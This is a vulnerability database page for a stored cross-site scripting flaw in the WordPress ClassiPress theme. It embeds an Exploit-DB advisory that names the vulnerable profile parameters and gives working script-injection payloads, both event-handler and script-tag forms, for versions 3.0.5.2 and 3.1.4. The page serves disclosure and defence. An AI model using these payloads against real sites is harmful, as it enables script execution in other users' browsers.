Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-79 |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
|
Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
4.3 |
|
AV:N/AC:M/Au:N/C:N/I:P/A:N |
nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 18053
Publication date : 2011-10-30 23h00 +00:00
Author : Paul Loftness
EDB Verified : Yes
# Exploit Title: WordPress Classipress Theme <= 3.1.4 Stored XSS
# Date: 2011-09-26
# Author: Paul Loftness
# Contact:http://attackvectorlabs.blogspot.com
# Vendor: Appthemes LLc.
# Product Web Page: http://www.appthemes.com/themes/classipress/
# Version: <=3.1.4
# Tested Versions: 3.1.4, 3.0.5.3
Summary:
-------------------------
ClassiPress is a popular and widely used classified ads software for WordPress.
Description:
-------------------------
Classipress is vulnerable to multiple stored XSS vulnerabilities. Input through the POST parameters 'facebook_id' and 'twitter_id' in a registered user's profile page is either not sanitisized or poorly sanitised (version specific) allowing the attacker to insert Javascript code.
In version 3.0.5.2 and presumably all previous versions, no sanitation is in place, allowing an attacker to insert code within a tag or to break out of it. In version 3.1.4, the less-than character is sanitised but an attacker can still insert quotes and place an event handler in the tag.
Proof-of-Concept Code:
-------------------------
Insertion page: http://example_site/author/profile/
Infected page : http://example_site/author/attacker_username/
Note: Some sites replace "author" with another path, this is not a vanilla configuration, however.
Version: ClassiPress 3.0.5.2
Vulnerable Input Parameters:
twitter_id: " onmouseover="alert('XSS');
facebook_id: " onmouseover="alert('XSS');
Alternate Exploit code:
twitter_id: "><script>alert('XSS');</script><div id="
facebook_id: "><script>alert('XSS');</script><div id="
Version: ClassiPress 3.1.4
Vulnerable Input Parameters:
twitter_id: " onmouseover='alert("XSS");'><
facebook_id: " onmouseover='alert("XSS");'><
Timeline:
-------------------------
Vulnerability Discovered: 8/10/2011
Vulnerability Reported to Vendor: 9/1/2011
Patch Released with version 3.1.5: 10/7/2011
Products Mentioned
Configuraton 0
Appthemes>>Classipress >> Version To (including) 3.1.4
Appthemes>>Classipress >> Version 3.0.5.2
Appthemes>>Classipress >> Version 3.0.5.3
Appthemes>>Classipress >> Version 3.1.3
Appthemes>>Classipress >> Version 3.1.5
Wordpress>>Wordpress >> Version -
References